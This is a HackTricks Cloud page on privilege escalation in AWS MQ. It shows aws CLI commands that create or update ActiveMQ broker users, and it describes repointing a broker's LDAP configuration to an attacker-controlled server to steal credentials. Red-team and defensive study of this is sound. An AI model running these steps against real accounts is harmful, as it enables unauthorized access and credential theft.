HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - MQ Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

MQ

For more information about MQ check:

mq:ListBrokers, mq:CreateUser

With those permissions you can create a new user in an ActimeMQ broker (this doesn't work in RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

With those permissions you can create a new user in an ActimeMQ broker (this doesn't work in RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:UpdateBroker

If a broker is using LDAP for authorization with ActiveMQ. It's possible to change the configuration of the LDAP server used to one controlled by the attacker. This way the attacker will be able to steal all the credentials being sent through LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).

Potential Impact: Steal ActiveMQ credentials

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - Mediapackage PrivescNextAWS - MSK Privesc

Last updated